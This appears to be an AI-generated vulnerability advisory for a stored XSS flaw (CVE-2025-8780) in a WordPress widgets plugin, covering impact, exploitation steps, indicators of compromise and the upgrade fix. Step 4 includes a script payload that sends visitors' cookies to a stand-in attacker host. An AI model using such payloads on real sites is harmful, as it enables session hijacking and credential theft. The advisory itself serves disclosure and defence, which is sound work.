CVE-2025-8780
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-8780 is a Stored Cross-Site Scripting (XSS) vulnerability in the Livemesh SiteOrigin Widgets plugin for WordPress, affecting all versions up to and including 3.9.1. The flaw exists in the Hero Header and Pricing Table widgets due to insufficient input sanitization and output escaping on user-supplied attributes. It was published on December 13, 2025, with a CVSS v3.1 base score of 6.4 (Medium), assigned by Wordfence (Wordfence, Red Hat CVE).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). Authenticated attackers with contributor-level access or above can inject arbitrary JavaScript into widget attributes (Hero Header and Pricing Table) that are rendered without proper sanitization or escaping. The injected scripts persist in the database and execute in the browsers of any user who visits the affected page. Patch diffs are publicly available in the WordPress plugin repository, showing the specific template files corrected in version 3.9.2 (Wordfence, WordPress Trac).

Impact

Successful exploitation allows authenticated contributors to inject persistent malicious scripts that execute in the context of any site visitor's browser, enabling session hijacking, credential theft, defacement, or redirection to malicious sites. The changed scope (S:C) in the CVSS vector reflects that the impact extends beyond the attacker's own session to affect all users visiting the compromised page. Availability is not directly impacted, but confidentiality and integrity are both at low risk per the CVSS assessment (Red Hat CVE, Wordfence).

Exploitability

No evidence of active in-the-wild exploitation has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.03%, indicating a low probability of near-term exploitation. Exploitation requires at minimum contributor-level authentication on the target WordPress site, which limits the attack surface compared to unauthenticated vulnerabilities (Wordfence, Red Hat CVE).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Livemesh SiteOrigin Widgets plugin at version 3.9.1 or earlier, using tools like WPScan or manual inspection of plugin metadata.
  2. Obtain contributor access: Register or compromise an account with at least contributor-level privileges on the target WordPress site.
  3. Edit or create a page/post: Navigate to the WordPress editor and add a Hero Header or Pricing Table widget from the Livemesh SiteOrigin Widgets plugin.
  4. Inject malicious payload: Insert a crafted XSS payload (e.g., "><script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable widget attribute field that lacks proper sanitization.
  5. Publish the page: Save and publish the page containing the injected widget.
  6. Trigger execution: Any authenticated or unauthenticated user who visits the page will have the malicious script execute in their browser, potentially exposing session cookies or other sensitive data (Wordfence, WordPress Trac).

Indicators of compromise

  • Logs: WordPress audit logs showing contributor-level users editing pages containing Hero Header or Pricing Table widgets with unusual attribute values; unexpected script tags in post content stored in the database.
  • File System: No direct file system changes expected for stored XSS, but review wp_posts and wp_postmeta database tables for entries containing <script>, javascript:, or encoded variants in widget attribute fields.
  • Network: Outbound requests from victim browsers to unknown external domains shortly after visiting pages with Livemesh SiteOrigin Widgets; unusual cookie or credential exfiltration traffic patterns.
  • Process/Application: Browser console errors or unexpected redirects reported by site visitors on pages using Hero Header or Pricing Table widgets (Wordfence).

Mitigation and workarounds

Site administrators should update the Livemesh SiteOrigin Widgets plugin to version 3.9.2 or later, which includes the fix for insufficient input sanitization and output escaping in the affected widget templates. No configuration-based workaround is available; upgrading is the only recommended remediation. Additionally, site administrators should audit contributor-level user accounts and restrict the ability to add or edit widgets to trusted users only (Wordfence, WordPress Plugin Page).

Community reactions

Wordfence published a weekly WordPress vulnerability report for December 8–14, 2025, which included CVE-2025-8780 among the disclosed vulnerabilities (Wordfence Blog). No significant independent researcher commentary or broader media coverage has been identified for this vulnerability.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-19848MEDIUM6.5
  • wp-user-avatar
NoYesAug 21, 2026
CVE-2026-17559MEDIUM5.3
  • content-protector
NoYesAug 21, 2026
CVE-2026-16650MEDIUM5.3
  • charitable
NoYesAug 21, 2026
CVE-2026-15150MEDIUM5.3
  • mycred
NoYesAug 21, 2026
CVE-2026-18356LOW3.7
  • limit-login-attempts-reloaded
NoYesAug 21, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management